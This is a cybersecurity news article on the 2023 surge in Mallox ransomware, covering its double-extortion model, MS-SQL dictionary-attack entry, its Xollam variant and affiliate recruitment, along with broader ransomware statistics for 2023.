According to a recent report from Palo Alto Networks Unit 42, Mallox ransomware activities in 2023 have surged by 174%, showcasing a significant increase from the previous year. Mallox, adopting the double extortion trend common among ransomware threat actors, steals data before encrypting an organization’s files and then threatens to publish the stolen data on a leak site to compel victims to pay the ransom fee. Linked to other ransomware strains such as TargetCompany, Tohnichi, Fargo, and the newly identified Xollam variant, Mallox first emerged in June 2021.
The group displays a distinctive pattern of targeting sectors like manufacturing, professional and legal services, and wholesale and retail. Notably, Mallox exploits poorly secured MS-SQL servers through dictionary attacks, serving as a penetration vector to compromise victims’ networks. The introduction of the Xollam variant marks a shift in tactics, utilizing malicious OneNote file attachments for initial access, as highlighted by Trend Micro.
Upon successfully infiltrating a host, Mallox executes a PowerShell command to retrieve the ransomware payload from a remote server. The ransomware binary takes various measures, including stopping SQL-related services, deleting volume shadow copies, clearing system event logs, terminating security-related processes, and attempting to bypass Raccine, an open-source tool designed to counter ransomware attacks. While TargetCompany remains a relatively small and closed group, it has been observed recruiting affiliates for the Mallox Ransomware-as-a-Service (RaaS) program on the RAMP cybercrime forum.
The surge in Mallox infections reflects a broader trend, with a 221% year-over-year increase in ransomware attacks as of June 2023. The rise is largely attributed to Cl0p’s exploitation of the MOVEit file transfer software vulnerability, contributing to 434 reported attacks in June 2023 alone. The financial motivation for ransomware remains high, with cybercriminals netting at least $449.1 million in the first half of 2023, according to Chainalysis.
Expressing concern over the heightened activity of the Mallox ransomware group in recent months, researchers emphasize the potential for more attacks, especially with ongoing recruiting efforts for affiliates. This underscores the evolving tactics of ransomware groups and the urgent need for organizations to bolster their cybersecurity measures to effectively counter these dynamic threats.